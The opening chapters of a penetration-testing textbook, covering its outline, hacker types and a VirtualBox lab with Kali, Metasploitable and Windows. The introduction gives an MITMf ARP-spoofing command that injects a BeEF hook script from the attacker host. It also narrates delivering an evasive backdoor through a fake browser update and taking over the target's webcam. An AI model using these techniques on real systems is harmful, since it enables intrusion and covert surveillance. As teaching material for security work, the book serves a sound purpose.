Learn Ethical Hacking from Scratch. E-Book

Learn Ethical Hacking from Scratch

Copyright © 2018 Packt Publishing

All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.

Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.

Commissioning Editor: Vijin BorichaAcquisition Editor:Namrata PatilContent Development Editor:Sneha GonsalvesTechnical Editor: Nilesh SawakhandeCopy Editor: Safis EditingProject Coordinator: Namrata SwettaProofreader: Safis EditingIndexer: Tejal Daruwale SoniGraphics: Jisha ChirayilProduction Coordinator:Aparna Bhagat

First published: July 2018

Production reference: 1310718

Published by Packt Publishing Ltd. Livery Place 35 Livery Street Birmingham B3 2PB, UK.

ISBN 978-1-78862-205-9

www.packtpub.com

Mapt is an online digital library that gives you full access to over 5,000 books and videos, as well as industry leading tools to help you plan your personal development and advance your career. For more information, please visit our website.

Why subscribe?

Spend less time learning and more time coding with practical eBooks and Videos from over 4,000 industry professionals

Improve your learning with Skill Plans built especially for you

Get a free eBook or video every month

Mapt is fully searchable

Copy and paste, print, and bookmark content

PacktPub.com

Did you know that Packt offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at www.PacktPub.com and as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at [email protected] for more details.

At www.PacktPub.com, you can also read a collection of free technical articles, sign up for a range of free newsletters, and receive exclusive discounts and offers on Packt books and eBooks.

Contributors

About the author

Zaid Sabih is an ethical hacker, a computer scientist, and the founder and CTO of zSecurity. He has good experience in ethical hacking; he started working as a pentester with iSecurity. In 2013, he started teaching his first network hacking course; this course received amazing feedback, leading him to publish a number of online ethical hacking courses, each focusing on a specific topic, all of which are dominating the ethical hacking topic on Udemy. Now Zaid has more than 300,000 students on Udemy and other teaching platforms, such as StackSocial, StackSkills, and zSecurity.

Packt is searching for authors like you

If you're interested in becoming an author for Packt, please visit authors.packtpub.com and apply today. We have worked with thousands of developers and tech professionals, just like you, to help them share their insight with the global tech community. You can make a general application, apply for a specific hot topic that we are recruiting an author for, or submit your own idea.

Table of Contents

Title Page

Copyright and Credits

Learn Ethical Hacking from Scratch

Dedication

Packt Upsell

Why subscribe?

PacktPub.com

Contributors

About the author

Packt is searching for authors like you

Preface

Who this book is for

What this book covers

To get the most out of this book

Download the example code files

Conventions used

Get in touch

Reviews

Introduction

What's in this book?

Preparation

Penetration testing

Network penetration testing

Gaining access

Post exploitation

Website penetration testing

Protecting your system

What is hacking?

Why should we learn about hacking?

A glimpse of hacking

Browser exploitation framework

Accessing the target computer's webcam

Summary

Setting Up a Lab

Lab overview

VirtualBox

Installation of VirtualBox

Installing Kali Linux

Installing Metasploitable

Installing Windows

Creating and using snapshots

Summary

Linux Basics

Overview of Kali Linux

Status bar icons

Connecting the wireless card

Linux commands

Commands

The ls command

The man command

The help command

The Tab button

Updating resources

Summary

Network Penetration Testing

What is a network?

Network basics

Connecting to a wireless adapter

MAC addresses

Wireless modes – managed and monitor

Enabling monitor mode manually

Enabling monitor mode using airmon-ng

Summary

Pre-Connection Attacks

Packet sniffing basics

Targeted packet sniffing

Deauthentication attack

What is a fake access point?

Creating fake access points with the MANA Toolkit

Summary

Network Penetration Testing - Gaining Access

WEP theory

Basic web cracking

Fake authentication attack

ARP request replay

WPA introduction

WPS cracking

Handshake theory

Capturing the handshake

Creating a wordlist

Wordlist cracking

Securing network from attacks

Summary

Post-Connection Attacks

Post-connection attacks

The netdiscover tool

The AutoScan tool

Zenmap

Summary

Man-in-the-Middle Attacks

Man-in-the–middle attacks

ARP spoofing using arpspoof

ARP spoofing using MITMf

Bypassing HTTPS

Session hijacking

DNS spoofing

MITMf screenshot keylogger

MITMf code injection

MITMf against a real network

Wireshark

Wireshark basics

Wireshark filters

Summary

Network Penetration Testing, Detection, and Security

Detecting ARP poisoning

Detecting suspicious behavior

Summary

Gaining Access to Computer Devices

Introduction to gaining access

Server side

Client side

Post-exploitation

Sever-side attacks

Server-side attack basics

Server-side attacks – Metasploit basics

Metasploit remote code execution

Summary

Scanning Vulnerabilities Using Tools

Installing MSFC

MSFC scan

MSFC analysis

Installing Nexpose

Running Nexpose

Nexpose analysis

Summary

Client-Side Attacks

Client-side attacks

Installing Veil

Payloads overview

Generating a Veil backdoor

Listening for connections

Testing the backdoor

Fake bdm1 updates

Client-side attacks using the bdm2 BDFProxy

Protection against delivery methods

Summary

Client-Side Attacks - Social Engineering

Client-side attacks using social engineering

Maltego overview

Social engineering – linking accounts

Social engineering – Twitter

Social engineering – emails

Social engineering – summary

Downloading and executing AutoIt

Changing the icon and compiling the payload

Changing extensions

Client-side attacks – TDM email spoofing

Summary

Attack and Detect Trojans with BeEF

The BeEF tool

BeEF – hook using a MITMf

BeEF – basic commands

BeEF – Pretty Theft

BeEF – Meterpreter 1

Detecting Trojans manually

Detecting Trojans using a sandbox

Summary

Attacks Outside the Local Network

Port forwarding

External backdoors

IP forwarding

External BeEF

Summary

Post Exploitation

An introduction to post exploitation

Meterpreter basics

Filesystem commands

Maintaining access by using simple methods

Maintaining access by using advanced methods

Keylogging

An introduction to pivoting

Pivoting autoroutes

Summary

Website Penetration Testing

What is a website?

Attacking a website

Summary

Website Pentesting - Information Gathering

Information gathering using tools

The Whois Lookup

Netcraft

Robtex

Websites on the same server

Information gathering from target websites

Finding subdomains

Information gathering using files

Analyzing file results

Summary

File Upload, Code Execution, and File Inclusion Vulnerabilities

File upload vulnerabilities

Getting started with Weevely

Code execution vulnerabilities

Local file inclusion vulnerabilities

Remote file inclusion using Metasploitable

Basic mitigation

Summary

SQL Injection Vulnerabilities

What is SQL?

The dangers of SQLi

Discovering SQLi

SQLi authorization bypass

Discovering an SQLi using the GET method

Basic SELECT statements

Discovering tables

Reading columns and their data

Reading and writing files on the server

The sqlmap tool

Preventing SQLi

Summary

Cross-Site Scripting Vulnerabilities

Introduction to XSS

Reflected XSS

Stored XSS

XSS BeEF exploitation

XSS protection

Summary

Discovering Vulnerabilities Automatically Using OWASP ZAP

OWASP ZAP start

OWASP ZAP results

Summary

Other Books You May Enjoy

Leave a review - let other readers know what you think

Preface

This book is intended for anyone who wants to learn how to perform hacking/penetration testing. It is designed to start from scratch, assuming no prior knowledge, and takes you all the way to a strong intermediate level in the subject. The book is highly practical but it will not neglect the theory. It starts with some basic terminology; then you'll learn how to set up a penetration-testing lab and install all the necessary software. The remainder of the book is divided into a number of sections, each covering a penetration testing field—from networks, servers, and websites to client-side attacks and social engineering. In each of these sections, you'll learn how a target system works, the weaknesses in the system, how to exploit those weaknesses and hack the system, and how to secure the system from the discussed weaknesses. By the end of the book, you'll have a strong base and a good understanding of hacking/penetration testing, so you'll be able to combine the techniques shown and tailor them to suit different scenarios.

Who this book is for

This book starts from scratch, assuming the reader has no prior knowledge of hacking/penetration testing. Therefore, it is for anybody who is interested in learning how to hack or test the security of systems like real hackers and secure them like security experts.

What this book covers

Chapter 1, Introduction, discusses the concept of ethical hacking and also covers basic information about the different fields of penetration testing.

Chapter 2, Setting Up a Lab, looks at setting up a lab and installing all the software that is needed in order to get started with penetration testing. We are going to discuss this because, all through this book, we are going to learn about launching attacks on our system by creating a virtual environment in it.

Chapter 3, Linux Basics, walks you through the Kali Linux environment so that you become familiar with the virtual framework. We will be learning some basic commands, as well as looking at the installation and updating of software.

Chapter 4, Network Penetration Testing, will cover the basics of what we mean by a network and will examine the various types of network. Also, we will discuss a few terminologies related to networks.

Chapter 5, Pre-Connection Attacks, will discuss wireless cards. Then we will learn how to gather information about networks and computers, and we'll learn how to launch attacks, such as controlling connections without having the credentials of the target. We will learn how to capture information about victims by creating fake access points to which the targets will be connected.

Chapter 6, Network Penetration Testing – Gaining Access, demonstrates how we can crack the key and gain access to our target by using all the information that we have gathered about the victim. This chapter we will also teach you how to crack WEP/WPA/WPA2 encryptions.

Chapter 7, Post-Connection Attacks, will teach you how to gather information about the network so that we can use it to perform further powerful attacks. To do so, we will be using various tools. Each of those tools has various advantages that we can exploit to find out more useful information about the victims.

Chapter 8, Man-in-the-Middle Attacks, will be about launching various man-in-the-middle attacks, such as ARP spoofing, session hijacking, and DNS spoofing. We will also learn about the Wireshark tool, which is incredibly effective for analyzing the packets flowing in and out of the victim's system.

Chapter 9, Network Penetration Testing, Detection, and Security, discusses ARP poisoning—we will discuss how to perform the attack, how to detect it, and also how to prevent and secure our systems from this attack. We will also be learning about how Wireshark can help us with all those endeavors.

Chapter 10, Gaining Access to Computer Devices, teaches us how to gain full control over any computer system. This chapter will cover the first approach, which is server-side attacks. In this chapter, we will learn how to gain full access to the target system without user intervention. We will even be gathering information about the operating system of the victim, as well as any open ports and installed services that might help us identify the weaknesses and vulnerabilities of that system. Then we will be exploiting the vulnerabilities to control the target.

Chapter 11, Scanning Vulnerabilities Using Tools, will show you how to use the built-in Metasploit framework to help us to scan the network and target so that we can gain information about them.

Chapter 12, Client-Side Attacks, looks at the second approach that can be used to gain access to the victim's system. Here, we will be making use of packets that move in and out of the target system to launch attacks. To track packets, we will learn about a tool called Veil, which even helps us generate backdoors. We'll also look at securing our system.

Chapter 13, Client-Side Attacks – Social Engineering, teaches you how to access the victim's systems when vulnerabilities are not apparent. In such cases, our only solution is interacting with the user, and that is where social engineering comes into play. We will be using various techniques to get the victim to install a backdoor to their device. To achieve this, we will be creating fake updates and backdooring downloaded files on the fly.

Chapter 14, Attacking and Detecting Trojans with BeEF, teaches us how to use the BeEF tool. We will learn some basic commands with it, and we'll use it to detect Trojans.

Chapter 15, Attacks Outside the Local Network, demonstrates the attacks that we will be launching on other networks. We will be learning about the concept of IP forwarding, and we'll also look at using external backdoors to launch these attacks.

Chapter 16, Post Exploitation, teaches you how to interact with a system that you've managed to break into. We will study how to maintain our access to the system (and filesystem) that we have hacked. We will also learn how to use the target computer to hack or spy on the other computers in the network.

Chapter 17, Website Penetration Testing, discusses how websites work, and we will even look at how the backend is exploited.

Chapter 18, Website Pentesting – Information Gathering, explains how we can gather information about our target, specifically website owners or servers hosting those websites. We can do this using commands and tools such as Netcraft. We will also be covering the concept of the subdomain.

Chapter 19, File Upload, Code Execution, and File Inclusion Vulnerabilities, deals with various vulnerabilities and also demonstrates, via examples, how to exploit them.

Chapter 20, SQL Injection Vulnerabilities, covers one of the most dangerous vulnerabilities, which is SQL injections. Here we will also learn about how we can detect such vulnerabilities and secure our systems from them.

Chapter 21, Cross-Site Scripting Vulnerabilities, covers cross-site scripting. Here we will learn about everything from launching attacks to securing your systems from those attacks. Furthermore, we'll also find out how we can detect those threats in our system.

Chapter 22, Discovering Vulnerabilities Automatically Using OWASP ZAP, teaches you how to use a tool called Zmap, which helps detect risks. It generates results of various scans, and we'll be analyzing those results in this chapter.

To get the most out of this book

To get the most out of this book, all you need are basic IT skills and a wireless adapter (for the Wi-Fi-cracking section only). That adapter can be anything as long as it has an Atheros chipset (such as ALFA AWUS036NHA).

Download the example code files

You can download the example code files for this book from your account at www.packtpub.com. If you purchased this book elsewhere, you can visit www.packtpub.com/support and register to have the files emailed directly to you.

You can download the code files by following these steps:

Log in or register at

www.packtpub.com

.

Select the

SUPPORT

tab.

Click on

Code Downloads & Errata

.

Enter the name of the book in the

Search

box and follow the onscreen instructions.

Once the file is downloaded, please make sure that you unzip or extract the folder using the latest version of:

WinRAR/7-Zip for Windows

Zipeg/iZip/UnRarX for Mac

7-Zip/PeaZip for Linux

The code bundle for the book is also hosted on GitHub athttps://github.com/PacktPublishing/Learn-Ethical-Hacking-from-Scratch. In case there's an update to the code, it will be updated on the existing GitHub repository.

We also have other code bundles from our rich catalog of books and videos available athttps://github.com/PacktPublishing/. Check them out!

Conventions used

There are a number of text conventions used throughout this book.

CodeInText: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: "We will go into the Metasploitable directory and select the .vmdk file"

A block of code is set as follows:

html, body, #map { height: 100%; margin: 0; padding: 0}

Any command-line input or output is written as follows:

-i eth0 -r 10.0.2.1/24

Bold: Indicates a new term, an important word, or words that you see onscreen. For example, words in menus or dialog boxes appear in the text like this. Here is an example:"If we go to Files|Downloads, we will see the file."

Get in touch

Feedback from our readers is always welcome.

General feedback: Email [email protected] and mention the book title in the subject of your message. If you have questions about any aspect of this book, please email us at [email protected].

Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packtpub.com/submit-errata, selecting your book, clicking on the Errata Submission Form link, and entering the details.

Piracy: If you come across any illegal copies of our works in any form on the Internet, we would be grateful if you would provide us with the location address or website name. Please contact us at [email protected] with a link to the material.

If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.

Reviews

Please leave a review. Once you have read and used this book, why not leave a review on the site that you purchased it from? Potential readers can then see and use your unbiased opinion to make purchase decisions, we at Packt can understand what you think about our products, and our authors can see your feedback on their book. Thank you!

For more information about Packt, please visit packtpub.com.

Introduction

Primarily, this chapter will provide a brief overview of the topics that will be covered throughout this book. It will cover all of the aspects associated with hacking, from how to perform hacking to protecting your system from being hacked. Later in the chapter, we will discuss the concept of hacking, discussing three types of hackers: white hat hackers, black hat hackers, and grey hat hackers. Toward the end of the chapter, we will illustrate some real-time hacking applications.

This chapter will address the following questions:

What's in this book?

What is hacking?

Why should we learn about hacking?

A glimpse of hacking

What's in this book?

In this book, you will learn how to become an ethical hacker from scratch. We'll assume that you have no experience in ethical hacking, and, by the end of the book, you will be at an intermediate (to high) level.

Here is a quick overview of what will be covered in this book:

Preparation

Penetration testing

Protecting your own system

Preparation

In the first part of this book, you will learn how to create your own lab, so that you can practice ethical hacking on your own computer. You will also learn the installation of Linux systems and how to interact with them, as well as how to set up other systems to try to hack into them.

Penetration testing

In this part of the book, we will cover the most important penetration testing fields. In each of these sections, we will first illustrate how a particular system works, and will then test the security of that system. In the following sections, we will introduce the types of penetration testing that will be seen in this book.

Network penetration testing

In network penetration testing, the first things that we will learn are how networks work and how devices interact with each other.

First, we will learn more about the networks around us; we will gradually proceed by setting up a fake access point and luring people into connecting to networks so that we can capture data that is sent or received through them. We will then learn how to get the password for any Wi-Fi network, whether it uses WEP, WPA, or WPA2 encryption.

We will also go over a large number of powerful attacks that will allow us to gain access to any account that is accessed from any computer in a network. We will be able to capture usernames, passwords, images, and pictures that computers on a network send or receive.

Gaining access

In this part of the chapter, we will learn how to gain access to computer systems. There are two methods to hack a computer:

Server-side attacks

Client-side attacks

When learning about server-side attacks, you will see how to discover weaknesses in the programs installed on the target computer, and how to use those weaknesses to gain full access to the computer.

In the client-side attacks, you're going to learn how to use social engineering to hack into the target, you'll learn how to create undetectable backdoors, backdoors that look like images and pictures, and so on. We will also learn how to gain access to any computer if that computer exists in our network by using fake updates or by using fake downloads.

Post exploitation

In this section, we look at post exploitation, learning how to control the devices that we hacked. So, we're going to see how to open a system's webcam, manage its filesystems, and download or upload files to it. We will also learn how to capture all of the key strikes that the person enters on their keyboard, or even use that computer as a pivot to hack into other computers.

Website penetration testing

In the final sections, which will be about website penetration testing, we will learn how to gather very comprehensive information about websites, including how to discover, exploit, and mitigate a large number of serious vulnerabilities.

Protecting your system

Finally, we will learn how to protect ourselves (and our systems) from the attacks discussed in the preceding sections.

What is hacking?

Through hacking, you can do anything that you're not supposed to do (or allowed to do). For example, you can view information that you don't have permission to see or use a computer that you're not allowed to use. There are many different types of hacking, such as email hacking, computer hacking, server hacking, and web application hacking.

There are three different types of hackers:

Black hathackers

: Black hat hackers hack into systems for their own benefit; these are the ones that steal money or break systems purely to benefit themselves.

White hat hackers

: White hat hackers try to secure systems; they might use the same methods as black hat hackers, but they only do it on systems for which they have permission to do so, in order to see if the systems are vulnerable—they hack them in order to fix them.

Grey hat hackers

: There are also grey hat hackers, which are a mix of both; they will test any systems that they want to test, even if they don't have permission to hack them. Once they do hack into things, they don't break anything or steal any money; they don't cause damage. They might even tell the administrators how to fix it.

In this book, we will be white hat hackers. This book is only about teaching hacking for educational purposes. It is for people who want to be able to secure their networks, and who want to work as pen testers to secure computer systems.

Why should we learn about hacking?

Hacking is an existing field—there are many job opportunities within it, it is happening every day, and it involves a growing demand for protection. We all heard about the SonyhackwhenPlayStationwas down for a considerable amount of time. Companies such as Sony are actually hiring people to try to hack into them. You're going to learn how to hack into networks andsystemsso that you can secure them from black hat hackers.

Not so long ago, someone found a way to brute-force the restore password key for Facebook on its mobile website, because Facebook didn't check for thenumberof times that you entered the incorrect PIN. Once the person had done this, they told Facebook about it, and they were rewarded with $20,000, because Facebook has a bug bounty program. At the moment, many websites and companies have bug bounties – they are asking people to try to hack them, and they will pay a certain amount of money if a hack is successful, depending on how dangerous the exploit is.

A glimpse of hacking

In the coming sections, we are going to learn how to install the operating systems and programs needed for hacking. We will then learn some basics about hacking, and how to use the operating systems involved. Before we start, I'd like to give you the gist of what you're going to be able to do by the end of this book. In this section, we are going to go through an example of hacking a Windows computer from a Linux machine.

Don't worry about how we installed these machines or how to run these commands; right now, this is just an example. In the future, we're going to break this into steps, and you will see exactly how to run the attack. You will also learn about how the attack works, and how to protect yourself from such an attack.

Browser exploitation framework

Now, we are going to use a program called Browser Exploitation Framework (BeEF):

We're going to launch BeEF XSS Framework. It uses JavaScript code to hook a target computer; once a computer is hooked, we'll be able to run a number of commands. Following is a screenshot of how it looks:

To run the commands, we will use a man-in-the-middle attack to automatically inject the hook code for BeEF. We will use a tool called MITMf to perform an ARP spoofing attack. We will give it the network interface, gateway, and target IP address, which is the address of the Windows machine.

Next, we will tell MITMf that we want it to inject a JavaScript URL, and give it the location where the hook is stored. The code will look something like this:

mitmf --arp --spoof -i eth0 --gateway 10.0.2.1 --target 10.0.2.5 --inject --js-url http://10.0.2.15:3000/hook.js

Once this is done, hit

Enter

, and it will run successfully. Its output is shown here:

This looks very complicated; we don't know where we got the options from, so it probably all looks very confusing in the preceding screenshot. Again, don't worry; we will discuss it in detail later on, and it will become easy for you. Right now, all we need to understand is that this program is going to inject the hook code; the code allows BeEF to hack into the computer, into the browser used by the target person, and the code can run without the person even knowing.

Now, go to the Windows machine and run the web browser. We're just going to go to any website, such as Google or Bing.

If you go back to the Kali machine, you'll see that we have the IP address of the target person under

Hooked Browsers

, and, if you click on the

Commands

tab, you'll see a large number of categories, with commands that you can run on the target computer. These are shown in the following screenshot:

Let's display a fake notification bar to the target telling them there's a new update, so click on

Social Engineering

|

Fake Notification Bar (Firefox)

, as shown in the following screenshot:

This is going to show the target person that there's a new update, and, once they have installed the update, we can hack into their computer. Now, let's configure the fake notification bar to install a backdoor once the user clicks on it.

We have a ready-made backdoor that's not detectable by antivirus programs (you will see how to do that in upcoming chapters). We will store that backdoor, and call it

update.exe

.

Next, we will click on

Execute

. Now, before we run the update, we will have to listen to incoming connections to connect to the target computer, once the victim tries to update their computers. Now, if we hit

Execute

on the fake notification bar command, the bar will be displayed in the target's browser, as shown in the following screenshot:

In the preceding screenshot, Firefox is showing that there is a critical update, and you need to click on

Install plug-in

to install that update. Once you have clicked on it, and you can see that it has downloaded an update file, save it, and then run the update.

If we go back to the Kali machine, we'll see that we managed to get a reverse session from the Windows machine. So, let's interact with that computer; we will basically have full control over it:

Now, let's see how to access the target computer's webcam.

Accessing the target computer's webcam

To access the webcam, we are going to use a plugin that comes with Meterpreter; we will use the webcam_stream command.

When we hit Enter, we will be able to turn the webcam on. It is a webcam that's actually attached to the Windows machine; we have hacked into the Windows machine, and we can do anything we want on it. Again, this is just an example of one attack that we're going to use. We're going to perform many more attacks like this, and all of them are going to allow us to gain full control over the target system.

Summary

In this chapter, we looked at some brief descriptions of the topics that will be thoroughly covered in this book. We discussed using a Linux machine to hack a computer with the Windows operating system. Then, we learned about the concept of hacking through the use of real-time examples. The different types of hackers were discussed. Finally, we saw various applications involved in hacking.

In the following chapter, we will set up a virtual environment to perform various penetration tests. We will also install Kali Linux, Windows, and Metaspoitable machines.

Setting Up a Lab

In the previous chapter, we learned the concept of hacking. In this chapter, we are going to learn how to set up a virtual environment, so that we can later perform penetration tests on it. In this chapter, we will cover the concept of virtual machines, and will also perform its installation steps. Later in the chapter, we will learn how to install Kali Linux, and the two victim machines on VirtualBox: Windows and the Metasploitable machine. We will also discuss what each of these machines does, and why we are going to use them. Toward the end of the chapter, we will see the concept of snapshots, and how to implement them.

The following topics will be covered in this chapter:

Lab overview

Installing Kali Linux

Installing Metasploitable

Installing Windows

Creating snapshots and using snapshots

Lab overview

Since this book is highly practical, we will need a lab, a place where we can learn and perform attacks. To create this, we're going to use a program called VirtualBox.

VirtualBox

VirtualBox is a program that will allow us to install machines, just like normal computers, inside our own machine. We will have one computer, and we will install other computers inside it, acting as virtual machines. These are very important in terms of penetration testing; we're going to be using them a lot in order to set up a lab. It's very important to note that a virtual machine is just like a completely separate, working machine; there is nothing we will lose by installing an operating system as a virtual machine, and it will perform just like it does when installed on a separate laptop. Basically, instead of having four or five computers or laptops around us (so that we can try to hack into them), we're going to install them as virtual machines inside our own machine. This might seem a bit vague now, but once we get further into the chapter, the concept of how VirtualBox works will become clearer.

Basically, we are going to have three computers inside our main computer. We will have the following three machines in our lab:

Attacker machine: Kali Linux

Victim 1: Metasploitable

Victim 2: Windows

For example, if our main computer has macOS, we are not going to do anything with that. We have a machine that will be an attacker machine, running Kali Linux, and we will learn more about Kali Linux in a later part of this chapter.

We will also have two victims:

A victim that runs on Windows.

A victim that runs an operating system called

Metasploitable.

So, we're going to have our own machine, and then have three separate machines inside it. This will be possible by using VirtualBox.

Installation of VirtualBox

When downloading VirtualBox, just grab the version that's compatible with your operating system. There is VirtualBox for Windows, macOS X, and Linux.

So, just find the VirtualBox version that is compatible with your operating system, double-click on it, and install it. Installing it is very simple; you just double-click it, click Next, Next, and Next, and it's installed. The following is a screenshot of VirtualBox; as we can see, it's installed, and we have no machines on the left-hand side of the window:

Installing Kali Linux

Throughout this book, we're going to use a number of penetration testing tools. You can go ahead and install each of these tools manually, or you can do what most pen testers, including myself, do—save time and effort by using an operating system designed for hacking. We're going to use an operating system called Kali Linux, a flavor of Linux based on Debian. It comes with all of the programs and applications that we need to use, preinstalled and preconfigured. This means that we can just install the operating system and start to learn hacking.

There are two options for installing Kali: install it as a virtual machine inside the current operating system or install it in the main machine as the main operating system. Throughout this book, we are actually going to be using it as a virtual machine, because using it as a virtual machine works exactly the same as using it as the main machine; it will be completely isolated from our computer running inside VirtualBox. If we break it, or mess things up, it would be very easy to fix. It's very easy to go back to other snapshots or configurations, and we won't lose any functionality by using it as a virtual machine. That is why we always use it this way.

The steps for installing Kali Linux are as follows:

Download the VirtualBox version for your computer.

After setting up VirtualBox, download Kali Linux, available at

https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-hyperv-image-download/

.

Scroll down, making sure to click on the Kali Linux VirtualBox Images, not on the VMware; then, download the version of Kali that's compatible with your system. So, if you have a 64-bit computer, download the 64-bit, and if you have a 32-bit computer, download the 32-bit.

After downloading it, you should get a file with a

.ova

extension; you will have the name followed by the

.ova

extension, as shown here:

To install this in VirtualBox, all we have to do is double-click on the file. You will see a window that will allow you to import the virtual machine. We're going to keep everything the same for now and we're just going to click on the

Import

button.

That's it; the virtual machine is ready to be used:

Before we start, we will look at how to modify some of the settings. We're going to click on the

Kali-Linux

tab, which can be seen on the left side of the window. Then, we're going to click on the Settings. The first thing that we are going to do here is go to

System

and modify the amount of RAM it has. Depending on how much RAM you have on your computer, you can give this a

2

, but 1 GB is enough for Kali. Usually, I leave it at

2

, because I have 16 GB of RAM.

Also, when you click on the

Processors

tab, you'll see that, by default, we have two processors assigned to it. Again, I have 8 CPUs, so 2 is not going to cause too much pressure on my computer; but 1 CPU is also enough for Kali.

Now, we're going to go to the

Network

settings, and we're going to set this to use a NAT network. Sometimes, when we set this to a

NAT Network

, we won't see a network name in here; for that, please check out the link

https://www.youtube.com/watch?v=y0PMFg-oAEs

and it will show how to create a

NAT Network

. This setting is basically going to create a virtual network that our host machine will be the router for, and then all of the virtual machines are going to be clients connected to this network. So, they're going to get internet connection from the host machine and, at the same time, all of my virtual machines will be connected to a virtual network. This is very handy, because my virtual machines will be able to communicate with each other; we can use one of them to hack into another, and we can use it to test network attacks, and much more.

This will allow my virtual machines to have internet connection, and it will also allow them to communicate with each other, all of this will be done through a virtual network. It will not use any of your wireless adapters or any of the wireless cards; it will create a virtual Ethernet network, so as far as the virtual machines are concerned, they're connected to a network through an Ethernet cable.

We can now click on

OK

and start our virtual machine.

Now, to start it, all we have to do is click on the

Start

button. Then, click inside the virtual machine, and hit

Enter

; now we are inside the virtual machine:

Now it's asking us for the username, and the default username is

root

, and then it's asking us for the password, and the default password is the reverse of that, which is

toor

. Since we installed this using the ready image, we can just click on the green button, or we can go to

View

|

Full-screen

; the screen will automatically resize to the size of our screen.

Now, note that top-right hand side of the screen, we should actually see a network icon, because we set this machine to use a NAT network. If we don't have a network icon, it means that the machine isn't connected to the NAT network, so if we open the browser, we will see that it's not connected to the internet.

To fix this issue, we just have to go to the top of the screen, and it will display menus. Going to

Devices

|

Network

, we can click on

Connect Network Adapter

as shown in the following screenshot:

We only have to do this once, and then the virtual machine will automatically connect to the NAT network. Once this is done, in just a few seconds, we will have a network icon appear, and if we click on it, we will get connected to a wired network.

As we can see in the following screenshot, it says

Wired Connected

, so Kali thinks it's connected to a wired network:

Now, if we just click Try Again in the browser, we will see internet working.

Don't be intimidated by this new operating system; we're going to go through the basics, and we're going to use it a lot. It's actually going to become very easy for you to use.

Also, like I said, you won't lose any functionality when you install Kali Linux as a virtual machine. It's actually better to install it as a virtual machine, because it's completely isolated from your computer, and it will be very easy to fix if things go wrong.

Installing Metasploitable

The second machine that we will use is Metasploitable. Metasploitable is another Linux machine, and you can think of it as the opposite of Kali. Kali is designed so that you can use it to hack into other devices, while Metasploitable is designed so that you hack into it, so it's designed for people who want to learn penetration testing. It is designed so that it has a number of vulnerabilities, and we're going to try to use Kali Linux in order to hack into Metasploitable. Therefore, this is going to be one of the target, or victim, machines.

You can download Metasploitable at https://information.rapid7.com/metasploitable-download.html.

You will end up with a ZIP file, like the following. Once you decompress it, you will get a directory named metasploitable-linux-2.0.0.zip; double-click it, and you'll see the following files:

So, we're going to create a new machine, through the following steps:

To get a virtual machine, we will click on

New

, and we will name it

Metasploitable

and change its type to a Linux machine. Then, hit

Next

, and give it only 1 GB of RAM.

Then, we are going to use the existing virtual file option, unlike when we created Kali Linux (that is, when we created a new virtual hard disk). The reason for this is that the image we have now is actually designed for VMware Player. So, we're going to import the hard disk file, or the hard disk image, so that we have an installation ready without having to install it. We're just going to use an existing hard disk file. We will go into the

Metasploitable

directory and select the

.vmdk

file.

Click on

Open and Create

. We are going to start the machine right now. This is what we will see when the machine is running and fully installed:

We don't really need to install anything, as we just imported a pre-made installation, a ready hard disk. So, now it's asking for the username,

msfadmin

. The password is the same. We are now logged in:

This machine only has a Terminal, and it's giving you a warning that you should never expose this machine to an external internet connection because it is a vulnerable machine, designed to be vulnerable. It's only inside our lab, installed as a virtual machine, so nobody outside our lab can access it, which is a really good way of using it. As mentioned previously, in later chapters, we're going to discuss how we can try to hack into this machine. Again, don't be intimidated by the Terminal; we're going to be using it a lot, and we're going to learn how to use it step by step.

If we want to turn this machine off, all we have to do is type in sudo poweroff—just run the command. After asking for the admin password, the machine just turns off:

Installing Windows

The last machine that we're going to talk about installing is the Windows machine. This is just a normal Windows machine, with Windows 10. This is going to be another victim, and we are going to see how we can hack it. Again, we installed Metasploitable because it has a large number of vulnerabilities, and it's designed to be hacked into. It has a Terminal that is not very user friendly, and it doesn't really mimic a normal user. The Windows machine, on the other hand, will be used for scenarios that mimic a normal user, a user just using Windows to browse the internet or do whatever normal people do on their machines.

So, Microsoft has actually released free versions, or free virtual machines, that you can download and use. These are available on Microsoft's website. You can download them at https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/.

So, we're going to create a new machine, through the following steps:

Make sure that you select which host operating system you have. If you have Windows, you click on the

Windows

tab, and if you have Mac, then click on the

Mac

tab, and so on.

From the drop-down boxes, select

MSEdge on Win (10)

, and make sure to select the VirtualBox image. These are all applications that allow us to install virtual machines. At the moment, we're using VirtualBox for everything, so just make sure you use the VirtualBox image. Once you do that, you will have a ZIP file named

MSEdge.Win10.VirtualBox.zip

. Uncompress it, and you will get the file

MSEDGE-Win10TH2.ova

.

Double-click on the

.ova

file, and VirtualBox will ask you to import the machine—it has already set up the settings for it. You can now import it the way it is, and modify the settings later and the Windows will be installed.

Before booting it, modify the settings, change RAM to 2 GB. We can then start it. Windows will start straight away—it is ready, given to us by Microsoft.

We have a fully working Windows machine here, Windows 10, and this will be the third machine that we use in our lab. It will be our second attacking machine—our second victim or target machine.

Creating and using snapshots

Now that we've created our virtual machines, it would be a good idea to take snapshots of them. A snapshot allows us to store the state of the current virtual machine, so that we can go back or forward in time, to a certain state. We can think of snapshots as bookmarks—for example, we can take snapshots of the fresh installations of the operating systems, and, if we update, configure, or break something in the future, we can go back to the fresh installations, or go back to the factory settings. We can also go forward to the updated system from there. We can take a snapshot whenever we want, and go back and forth between states.

The following are the steps for taking snapshots:

Click on Kali Linux that we installed; it's very easy to create a snapshot of it. All you have to do is go to

Snapshots

and click on the camera icon, which appears on the icon bar at the top:

It will ask us to name the snapshot, so we will just name it

Fresh Install

